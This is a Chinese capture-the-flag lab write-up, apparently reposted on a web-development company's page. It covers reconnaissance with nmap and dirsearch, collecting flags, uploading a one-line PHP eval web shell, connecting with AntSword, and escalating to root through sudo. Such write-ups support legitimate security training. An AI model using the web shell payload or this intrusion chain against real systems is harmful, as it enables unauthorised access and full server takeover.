伊犁哈萨克自治州网站建设_网站建设公司_后端开发_seo优化
2026/1/16 18:39:19 网站建设 项目流程

实验目的:

掌握nmap、dirb等工具的使用,掌握单主机渗透常规思路。

软件工具:

Nmap,dirb ,AntSword

实验目标:

获得flag

实验步骤:

信息收集

在kali中打开终端,使用nmap工具对目标机器进行扫描

发现目标开启了http服务也就是80端口

在浏览器上输入靶机ip看看,发现是个登录界面

尝试一下sql注入发现好像不行,也没有发现什么信息

接着使用dirsearch工具进行路径的扫描(-i返回200状态码的)

扫描出了不少的路径,看到了网络爬虫协议

下面列出来禁止爬取的路径,那就不告诉我们存在这些路径

在/flag路径下拿到第一个flag

接着查找一下别的路径,在路径下有个管理员路径显示无法使用,但是返回的状态码是200

ctrl+u查看一下源代码

果然藏了东西,获得第二个flag并且还有一个账号和密码,想到刚刚的登录界面尝试登录一下首页

这是一个文件上传的页面,上传带有一句话木马的php

<?php @eval($_POST[hack])?> 然后修改后缀为php的文件

发现竟然可以成功上传

在之前的路径扫描中知道路径下有个uploaded_files/的路径,尝试一下

成功上传,并且执行了phpinfo命令

接着使用蚁剑进行连接,密码是刚刚一句话木马里面的hack

在hint.txt中成功拿到第三个flag

上传有个提示告诉我们存在一个用户technawi,并且有个flag.txt文件需要这个权限

接着我们打开蚁剑的终端窗口

定位technawi用户文件:find / -user ‘technawi’ 2>/dev/null

(这个命令的核心是在整个文件系统中查找所有属于用户 technawi 的文件 / 目录,同时屏蔽执行过程中产生的 “权限不足” 等错误提示,只输出有效结果。)

-user:find 命令的内置参数,专门用于匹配 “文件属主”;

2>/dev/null:2标准错误输出 >重定向 /dev/null 空设备,相当于被丢弃

发现有个txt文件比较奇怪,查询试试

成功拿到第四个flag

里面竟然存放了technawi的账号和密码

接着回到虚拟机登录一下这个用户的账号和密码,使用远程连接ssh@靶机的ip

然后查看flag.txt文件

成功拿到第5个flag

Sudo提权

前面我们在home目录下发现 .sudo_as_admin_successful 文件,表示需要使用sudo提权。

输入sudo -l :查看用户technawi的sudo权限配置

显示“ALL”说明technawi可以用自己的密码切换为 root 用户

简单来说就是:即可以通过 sudo 获取 root 权限

直接输入sudo su

成功提权成为root用户

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询